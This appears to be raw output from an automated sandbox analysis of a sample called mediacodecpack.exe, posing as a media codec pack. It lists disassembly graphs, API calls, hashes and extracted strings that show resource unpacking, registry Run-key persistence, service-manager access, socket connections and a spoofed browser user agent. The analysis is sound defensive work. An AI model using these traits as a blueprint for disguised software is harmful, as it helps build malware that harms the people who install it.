                                                                                        • Instruction Fuzzy Hash: AE315971A007019FD720EF28CC48B6BBBE4EF84750F1049A9F8558B2A1DB309D4ACB92

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00B04D8B
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B04DB7
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B04DC3
                                                                                          • Part of subcall function 00B04BED: __EH_prolog.LIBCMT ref: 00B04BF2
                                                                                          • Part of subcall function 00B04BED: InterlockedExchange.KERNEL32(?,00000000), ref: 00B04CF2
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B04E93
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B04E99
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B04EA0
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B04EA6
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B050A7
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B050AD
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B050B8
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B050C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                        • String ID:
                                                                                        • API String ID: 2062355503-0
                                                                                        • Opcode ID: ea6193fe4b32ce4e535fcf5c14ce8f677d26cd491e319feba7c50fbe2dfcac5a
                                                                                        • Instruction ID: 658e767cf4d2ab14fbccca08145016babdbc122e28803d43e8c3d11905000566
                                                                                        • Opcode Fuzzy Hash: ea6193fe4b32ce4e535fcf5c14ce8f677d26cd491e319feba7c50fbe2dfcac5a
                                                                                        • Instruction Fuzzy Hash: A9B14A71D0425D9FEF25DFA0D845BEEBBF4AF04314F24409AE40966281DBB46A49CF91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 491 401301-40135e FindResourceA 492 401360-401362 491->492 493 401367-40137d SizeofResource 491->493 496 401538-40153c 492->496 494 401386-4013fe LoadResource LockResource GlobalAlloc call 402490 * 2 493->494 495 40137f-401381 493->495 501 401407-40140b 494->501 495->496 502 40140d-40141d 501->502 503 40141f-401428 GetTickCount 501->503 502->501 505 401491-401499 503->505 506 40142a-40142e 503->506 507 4014a2-4014a8 505->507 508 401430-401438 506->508 509 40148f 506->509 510 4014f0-401525 GlobalAlloc call 401000 507->510 511 4014aa-4014e8 507->511 512 401441-401447 508->512 509->510 519 40152a-401535 510->519 513 4014ea 511->513 514 4014ee 511->514 516 401449-401485 512->516 517 40148d 512->517 513->514 514->507 520 401487 516->520 521 40148b 516->521 517->506 519->496 520->521 521->512
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                        • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindSizeof
                                                                                        • String ID:
                                                                                        • API String ID: 3019604839-3916222277
                                                                                        • Opcode ID: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                        • Instruction ID: 779852d327d389dbbb2f1b261a2bb7141e3a4eae573781fe7d13a424a4f3f89b
                                                                                        • Opcode Fuzzy Hash: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                        • Instruction Fuzzy Hash: F1811075D04258DFDF01CFE8D985AEEBBB0BF09305F1400AAE581B7262C3385A84DB69

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 523 b026db-b02726 RtlEnterCriticalSection 524 b02728-b02736 CreateWaitableTimerA 523->524 525 b0277e-b02781 523->525 528 b02738-b02756 GetLastError call b0fb20 call b01712 524->528 529 b0275b-b02778 SetWaitableTimer 524->529 526 b02783-b02798 call b127c5 525->526 527 b027d5-b027f0 RtlLeaveCriticalSection 525->527 534 b027ca 526->534 535 b0279a-b027ac call b127c5 526->535 528->529 529->525 538 b027cc-b027d0 call b06e07 534->538 541 b027b9 535->541 542 b027ae-b027b7 535->542 538->527 543 b027bb-b027c3 call b01cf8 541->543 542->543 545 b027c8 543->545 545->538
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00B02706
                                                                                        • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 00B0272B
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B23173), ref: 00B02738
                                                                                          • Part of subcall function 00B01712: __EH_prolog.LIBCMT ref: 00B01717
                                                                                        • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 00B02778
                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00B027D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                        • String ID: timer
                                                                                        • API String ID: 4293676635-1792073242
                                                                                        • Opcode ID: d4abd834cd8378b44c0c312c2f253315ab407c38e7753d935cfe115658d1ff15
                                                                                        • Instruction ID: b155cfd89b986305a2d930b422de4946e22c4cd7c40f41a8e4e9b78a4943e2e7
                                                                                        • Opcode Fuzzy Hash: d4abd834cd8378b44c0c312c2f253315ab407c38e7753d935cfe115658d1ff15
                                                                                        • Instruction Fuzzy Hash: B031ADB1404705AFD320DF25D888B66BBE8FB48B65F004A6EF819836C0DB70EC55CBA5

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 574 401e4e-401e4f 575 401e51-401e54 574->575 576 401e22-401e37 574->576 578 401e56-401e7e LoadLibraryExA 575->578 579 401eca-401ed6 575->579 577 40dc1b-40dc22 576->577 580 40de67 577->580 578->579 582 401dd0 578->582 581 40207f-40d1c2 579->581 586 40de6a 580->586 588 40d9ae 581->588 583 401dd6-402282 582->583 584 401f6b-401fa1 582->584 583->580 584->581 584->588 586->586 588->577
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: Curr$entV$ersi$on\R$ows\
                                                                                        • API String ID: 1029625771-1474489434
                                                                                        • Opcode ID: f444551602b2b86e4a4a20a609321a93c0450eb734b73b7cbcf43e92de4f6f8f
                                                                                        • Instruction ID: f023023372e99afa5c1116a4d80dcbe190962e31142eb026a9c01bd4ea8a2df4
                                                                                        • Opcode Fuzzy Hash: f444551602b2b86e4a4a20a609321a93c0450eb734b73b7cbcf43e92de4f6f8f
                                                                                        • Instruction Fuzzy Hash: 9D219270D14625CFCB04DFA8CD85AEDB7B1BB05B00F14856AE0127B7E1C378A842DB4A

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 673 b01ba7-b01bcf call b22a10 RtlEnterCriticalSection 676 b01bd1 673->676 677 b01be9-b01bf7 RtlLeaveCriticalSection call b0d334 673->677 678 b01bd4-b01be0 call b01b79 676->678 679 b01bfa-b01c20 RtlEnterCriticalSection 677->679 685 b01be2-b01be7 678->685 686 b01c55-b01c6e RtlLeaveCriticalSection 678->686 681 b01c34-b01c36 679->681 683 b01c22-b01c2f call b01b79 681->683 684 b01c38-b01c43 681->684 688 b01c45-b01c4b 683->688 691 b01c31 683->691 684->688 685->677 685->678 688->686 690 b01c4d-b01c51 688->690 690->686 691->681
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00B01BAC
                                                                                        • RtlEnterCriticalSection.NTDLL ref: 00B01BBC
                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 00B01BEA
                                                                                        • RtlEnterCriticalSection.NTDLL ref: 00B01C13
                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 00B01C56
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 1633115879-0
                                                                                        • Opcode ID: 0797ae3b129d22d26ff88eead8a594f1850ac3dcfa41305958481c222747fb87
                                                                                        • Instruction ID: 47b73458fedac41fd924f2cf9ca3ac754458f93d7e945922242c93abed4c7b20
                                                                                        • Opcode Fuzzy Hash: 0797ae3b129d22d26ff88eead8a594f1850ac3dcfa41305958481c222747fb87
                                                                                        • Instruction Fuzzy Hash: 13219C755006049FDB28CF68D8447AABBF4FF48724F108989E8199B341DB75E945CBE0

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 693 402149-40214c 694 4021bd-4021c3 693->694 695 40214d-40214e 693->695 694->693 698 4021c5-4021c6 694->698 696 402150-402163 695->696 697 402139-402140 695->697 701 40e040 696->701 699 402142-402147 697->699 700 402109-40210b 697->700 702 4021d5-4021da 698->702 703 4021c8-4021d4 698->703 699->693 700->697 709 40e043 701->709 704 402171-40d643 702->704 705 4021dc-4021de 702->705 703->702 710 40d955-40e095 OpenSCManagerA 704->710 707 4021e0-40d9f1 705->707 708 402223 CopyFileA 705->708 707->701 712 402229-40222d 708->712 709->709 716 40e09b 710->716 717 4021ed-4021f9 710->717 712->710 718 40e09c 716->718 717->712 718->718
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: KCU:$h "H
                                                                                        • API String ID: 0-3841667563
                                                                                        • Opcode ID: 70e05740465bff6623fe55717a1e0cb7cab08e4fdb1563974d3bfdd56af563f9
                                                                                        • Instruction ID: 63b4f081242afd7d5de53f06e14c51bfbfcc0f1bc0993d0d4b68f313483703d4
                                                                                        • Opcode Fuzzy Hash: 70e05740465bff6623fe55717a1e0cb7cab08e4fdb1563974d3bfdd56af563f9
                                                                                        • Instruction Fuzzy Hash: 25112971848212DFD3124F909B592A677B1EB12300F24543B8582AB2D2C2BD4A4BD78F

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 719 b0615e-b06161 720 b06163-b06174 719->720 721 b060f5-b06139 Sleep RtlEnterCriticalSection RtlLeaveCriticalSection 719->721 723 b0613d-b06149 720->723 721->723 723->719
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(0000EA60), ref: 00B06104
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B0610F
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B06120
                                                                                        Strings
                                                                                        • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 00B06129
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeaveSleep
                                                                                        • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                        • API String ID: 1566154052-1923541051
                                                                                        • Opcode ID: fe71bbfb5f81ac9c03b51faf94c49072c4f602995046d41caee8f376e575a60e
                                                                                        • Instruction ID: 33ba337c7e1505136c4a6dd664a157dfb9af8a7c7804eea49102fd2b925fd689
                                                                                        • Opcode Fuzzy Hash: fe71bbfb5f81ac9c03b51faf94c49072c4f602995046d41caee8f376e575a60e
                                                                                        • Instruction Fuzzy Hash: 8BF0F63254C3C08FC7138770AC989A53FF0BF5B314B1A00D7E585AF4A3C6A92809C7A2
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32 ref: 00402A46
                                                                                          • Part of subcall function 00403B64: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                          • Part of subcall function 00403B64: HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                        • GetCommandLineA.KERNEL32 ref: 00402A94
                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 00402ABF
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402AE2
                                                                                          • Part of subcall function 00402B3B: ExitProcess.KERNEL32 ref: 00402B58
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2057626494-0
                                                                                        • Opcode ID: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                        • Instruction ID: 5f87248e4510ca7a7a053da507506fe2897125482441b09741c869e2758f94b2
                                                                                        • Opcode Fuzzy Hash: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                        • Instruction Fuzzy Hash: BA214CB19006159ADB04AFA6DE49A6E7FA8EB04715F10413FF905BB2D1DB384900CA6C
                                                                                        APIs
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00B02EEE
                                                                                        • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00B02EFD
                                                                                        • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00B02F0C
                                                                                        • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 00B02F36
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$Socketsetsockopt
                                                                                        • String ID:
                                                                                        • API String ID: 2093263913-0
                                                                                        • Opcode ID: 50bddb6fc95b42f5af1d3fcd669252ef1ee4a88859b0bdd58ad7ccd0e7d9cf24
                                                                                        • Instruction ID: 4231981bf5d2ceb33da868d1cc46697a19d9c7d77449f879a0d3394d19ca7c16
                                                                                        • Opcode Fuzzy Hash: 50bddb6fc95b42f5af1d3fcd669252ef1ee4a88859b0bdd58ad7ccd0e7d9cf24
                                                                                        • Instruction Fuzzy Hash: 51014471601305BBDB309F65DC89B9BBFB9EB85772F0085A5F918DB191DA708D018BA0
                                                                                        APIs
                                                                                          • Part of subcall function 00B02D39: WSASetLastError.WS2_32(00000000), ref: 00B02D47
                                                                                          • Part of subcall function 00B02D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 00B02D5C
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00B02E6D
                                                                                        • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 00B02E83
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$Sendselect
                                                                                        • String ID: 3'
                                                                                        • API String ID: 2958345159-280543908
                                                                                        • Opcode ID: c5dcc7e64bf01f6c1c12d865f3fcf9cf454156a98d1ad7a0517bd71bdc35c78a
                                                                                        • Instruction ID: f6156be87d6d863319d11e45fd2e11f65510afd25e0456f697a747b44a47ad79
                                                                                        • Opcode Fuzzy Hash: c5dcc7e64bf01f6c1c12d865f3fcf9cf454156a98d1ad7a0517bd71bdc35c78a
                                                                                        • Instruction Fuzzy Hash: 7931C2B0A002099FDF10EF64D8597EEBFE9EF04354F0046EAE804972C1E77199498BA0
                                                                                        APIs
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00B02AEA
                                                                                        • connect.WS2_32(?,?,?), ref: 00B02AF5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLastconnect
                                                                                        • String ID: 3'
                                                                                        • API String ID: 374722065-280543908
                                                                                        • Opcode ID: 0a899517f68e4c05aa5b6a5918a7026b845a5a1d85ded342582efd079a84e4c2
                                                                                        • Instruction ID: 459d049f44d509f18211d0ce02546d8a0f6781da6949c3e715468eb1699addd0
                                                                                        • Opcode Fuzzy Hash: 0a899517f68e4c05aa5b6a5918a7026b845a5a1d85ded342582efd079a84e4c2
                                                                                        • Instruction Fuzzy Hash: C221C674E00205ABCF24FFA4D8196BEBFF9EF44324F1081D9E818972C1EB744A068B91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: a1bea7adcc9b66ce5e083fc23fe0f7cffbb28743eac70f60794ff164be4b270e
                                                                                        • Instruction ID: 7605f73ff76e3f315e09767aae03ff3950b25f2c3fc6d885eb85bdea98191c69
                                                                                        • Opcode Fuzzy Hash: a1bea7adcc9b66ce5e083fc23fe0f7cffbb28743eac70f60794ff164be4b270e
                                                                                        • Instruction Fuzzy Hash: 26514CB1904216DFCB18DF68D8556AABFF4FF08720F10819EE8299B391D7759A11CFA0
                                                                                        APIs
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, xrefs: 0040D655
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpi
                                                                                        • String ID: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                        • API String ID: 1586166983-2037762836
                                                                                        • Opcode ID: 17134def4ae493ed892da5cf1e4e02e31044a7d05c58cb64cc9be4b1d3063305
                                                                                        • Instruction ID: 16557cb42895348a952eaf9991b4a66d97034997999308634aca6265cd08f949
                                                                                        • Opcode Fuzzy Hash: 17134def4ae493ed892da5cf1e4e02e31044a7d05c58cb64cc9be4b1d3063305
                                                                                        • Instruction Fuzzy Hash: E321BB326041618FC7219B69D985BE5BBB0EF0131076844BBE086F71E2D339D907DB8A
                                                                                        APIs
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00B036A7
                                                                                          • Part of subcall function 00B02420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00B02432
                                                                                          • Part of subcall function 00B02420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00B02445
                                                                                          • Part of subcall function 00B02420: RtlEnterCriticalSection.NTDLL(?), ref: 00B02454
                                                                                          • Part of subcall function 00B02420: InterlockedExchange.KERNEL32(?,00000001), ref: 00B02469
                                                                                          • Part of subcall function 00B02420: RtlLeaveCriticalSection.NTDLL(?), ref: 00B02470
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                        • String ID:
                                                                                        • API String ID: 1601054111-0
                                                                                        • Opcode ID: 012673d7bda3e0fe69dbd67867dc2c7beb56c8e76d56e6fa856662d83d0a44cb
                                                                                        • Instruction ID: f3cf284571c1b0a3f123f2c178a85c61ff8539f66e97f864e0a3ef96f94c43e7
                                                                                        • Opcode Fuzzy Hash: 012673d7bda3e0fe69dbd67867dc2c7beb56c8e76d56e6fa856662d83d0a44cb
                                                                                        • Instruction Fuzzy Hash: 1B11C1F5204208ABDB218F14CC89FAA3FE9EF04B50F204456FE56DA2D0CB74DE609B94
                                                                                        APIs
                                                                                        • __beginthreadex.LIBCMT ref: 00B11116
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000002,00B0998D,00000000), ref: 00B11147
                                                                                        • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,00B0998D,00000000), ref: 00B11155
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandleResumeThread__beginthreadex
                                                                                        • String ID:
                                                                                        • API String ID: 1685284544-0
                                                                                        • Opcode ID: 42bd27dd490b704f98c4e4d513ab473321c41fd2f69f10b208aec1a742540d0a
                                                                                        • Instruction ID: dafc5e35d06dc401389fdb1958cd6f859b4fda63e84cf1421fd97e7a4fd6bd46
                                                                                        • Opcode Fuzzy Hash: 42bd27dd490b704f98c4e4d513ab473321c41fd2f69f10b208aec1a742540d0a
                                                                                        • Instruction Fuzzy Hash: 52F06871200200ABDB209F5CDC81FD5B3E8EF59725F64099AF754E7290D771ACE29A90
                                                                                        APIs
                                                                                        • InterlockedIncrement.KERNEL32(00B3529C), ref: 00B01ABA
                                                                                        • WSAStartup.WS2_32(00000002,00000000), ref: 00B01ACB
                                                                                        • InterlockedExchange.KERNEL32(00B352A0,00000000), ref: 00B01AD7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Interlocked$ExchangeIncrementStartup
                                                                                        • String ID:
                                                                                        • API String ID: 1856147945-0
                                                                                        • Opcode ID: ceea8f66790d580d557ac4bd0ec78cdbf2bc5d9de8935f55a3360a911c2eb432
                                                                                        • Instruction ID: 115af4c0231289d2d4e16689397397343a2d0da62d4dcaa9dc2b84d0d31bb890
                                                                                        • Opcode Fuzzy Hash: ceea8f66790d580d557ac4bd0ec78cdbf2bc5d9de8935f55a3360a911c2eb432
                                                                                        • Instruction Fuzzy Hash: A1D05E31944A085BD23067A4AD0FA7A7BACD706712F500691FD65C61E0EE61692085A7
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B38000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B38000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b38000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: InternetOpen
                                                                                        • String ID: U[6
                                                                                        • API String ID: 2038078732-2089642770
                                                                                        • Opcode ID: b2956d3dd9b0e15e94d071e54ae06227d6ce3089cc0f04671975aae9c41fc50b
                                                                                        • Instruction ID: e79f0d8eca733b0defede186f096dda241d3ab8f82af463b940dbb2a4305f826
                                                                                        • Opcode Fuzzy Hash: b2956d3dd9b0e15e94d071e54ae06227d6ce3089cc0f04671975aae9c41fc50b
                                                                                        • Instruction Fuzzy Hash: 65515EB260C600AFE7156F19ECC5BBAFBE9EF98320F06092DE7D583700D63558508A97
                                                                                        APIs
                                                                                        • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D955
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ManagerOpen
                                                                                        • String ID: \
                                                                                        • API String ID: 1889721586-2967466578
                                                                                        • Opcode ID: 47e18badabb9a11a3572604af3e4cd9f8c383518db4218f6d02ffe5002e8c993
                                                                                        • Instruction ID: 8e8821c1328745804740ee922d0e0ad68cd22f4e5c91e5f54ebb7d82a2aacae8
                                                                                        • Opcode Fuzzy Hash: 47e18badabb9a11a3572604af3e4cd9f8c383518db4218f6d02ffe5002e8c993
                                                                                        • Instruction Fuzzy Hash: 1CF0B170808305DFD7545F909F595EE76649B00704F30187BD252B51D1C67D0D86EB1E
                                                                                        APIs
                                                                                        • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D955
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ManagerOpen
                                                                                        • String ID: \
                                                                                        • API String ID: 1889721586-2967466578
                                                                                        • Opcode ID: 17e45ab395ead0f62f396e7f1f242be3a45938007961b54f1ffbde5d339a0c73
                                                                                        • Instruction ID: dfed284e86085894593c89054d3589a99278d46d110c027cd813ee3a9ff9004b
                                                                                        • Opcode Fuzzy Hash: 17e45ab395ead0f62f396e7f1f242be3a45938007961b54f1ffbde5d339a0c73
                                                                                        • Instruction Fuzzy Hash: 2EE08670404149FEDB244A985F5DBEA25E85700384F3404F79685B50D1C1780E49AA6B
                                                                                        APIs
                                                                                        • RegSetValueExA.KERNELBASE(?,media_codec_pack_i54,00000000,00000004), ref: 0040D0C4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value
                                                                                        • String ID: media_codec_pack_i54
                                                                                        • API String ID: 3702945584-2191737078
